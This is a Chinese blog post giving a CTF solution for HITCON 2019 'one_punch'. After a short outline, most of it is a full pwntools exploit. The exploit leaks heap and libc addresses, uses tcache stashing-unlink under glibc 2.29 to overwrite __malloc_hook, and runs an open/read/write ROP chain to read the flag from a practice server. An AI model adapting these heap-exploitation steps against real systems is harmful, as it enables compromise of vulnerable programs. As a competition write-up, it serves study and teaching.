hitcon_ctf_2019_one_punch(23/100)

思路

2.29下的tcachesmash利用
覆蓋目標(biāo)位置后使用后門函數(shù)實(shí)現(xiàn)tcache攻擊,覆蓋malloc_hook
orw讀flag

EXP

from pwn import *

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

# context.log_level ='debug'
#p = process('./hitcon_ctf_2019_one_punch')
p = remote('node4.buuoj.cn','26635')
elf = ELF('./hitcon_ctf_2019_one_punch')
libc = elf.libc

def cmd(choice):
    sla('> ',choice)

def add(idx,content):
    cmd(1)
    sla('idx: ',idx)
    p.sendafter('hero name: ',content)

def edit(idx,content):
    cmd(2)
    sla('idx: ',idx)
    p.sendafter('hero name: ',content)

def show(idx):
    cmd(3)
    sla('idx: ',idx)

def delete(idx):
    cmd(4)
    sla('idx: ',idx)

def dbg():
    gdb.attach(p)
    pause()

def backdoor(content):
    cmd(50056)
    p.send(content)

for i in range(7):
    add(0,'a'*0x80)
    delete(0)
show(0)
p.recvuntil('hero name: ')
heap_base = u64((p.recv(6).ljust(8,'\x00')))-0x530
lg('heap_base',heap_base)

for i in range(7):
    add(1,0x400*'a')
    delete(1)
add(1,0x400*'a')
add(2,0x400*'a')
delete(1)
show(1)
p.recvuntil('hero name: ')
libc_base = uu64()-96-0x1E4C40
lg('libc_base',libc_base)
#======================================
backdoor_addr = heap_base + 0x1f
add(1,0x400*'a')
for i in range(6):
    add(2,0xf0*'a')
    delete(2)

add(1,0x400*'a')#smbin1->1
add(2,0x300*'a')
delete(1)
add(2,0x300*'a')
add(2,0x400*'a')#smbin2->2
add(0,0x300*'a')
delete(2)
add(1,0x300*'a')
add(1,0x300*'a')
edit(1,'./flag'.ljust(8,'\x00'))
edit(2,'a'*0x300+p64(0)+p64(0x101)+p64(heap_base+0x33e0)+p64(backdoor_addr))
#==========================================
malloc_hook = libc_base + libc.sym['__malloc_hook']
add(0,0x217*'a')
delete(0)
edit(0,p64(malloc_hook))
add(0,'a'*0xf0)#make
backdoor('a')
# add_rsp_0x38 = 0xddadd+libc_base
# lg('add_rsp_0x38',add_rsp_0x38)
add_rsp_0x48 = libc_base + 0x8cfd6
backdoor(p64(add_rsp_0x48))
#==========================================
pop_rdi_ret = 0x26542+libc_base
pop_rsi_ret = 0x26f9e+libc_base
pop_rdx_ret = 0x12bda6+libc_base
pop_rax_ret = 0x47cf8+libc_base
syscall_ret = 0xcf6c5+libc_base


rops = p64(pop_rdi_ret)+p64(heap_base+0x3f20)
rops += p64(pop_rsi_ret)+p64(0)
rops += p64(pop_rdx_ret)+p64(0)
rops += p64(pop_rax_ret)+p64(2)
rops += p64(syscall_ret)
rops += p64(pop_rdi_ret)+p64(3)
rops += p64(pop_rsi_ret)+p64(heap_base+0x22b0)
rops += p64(pop_rdx_ret)+p64(0x100)
rops += p64(pop_rax_ret)+p64(0)
rops += p64(syscall_ret)
rops += p64(pop_rdi_ret)+p64(1)
rops += p64(pop_rsi_ret)+p64(heap_base+0x22b0)
rops += p64(pop_rdx_ret)+p64(0x100)
rops += p64(pop_rax_ret)+p64(1)
rops += p64(syscall_ret)
add(0,rops)

p.interactive()
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容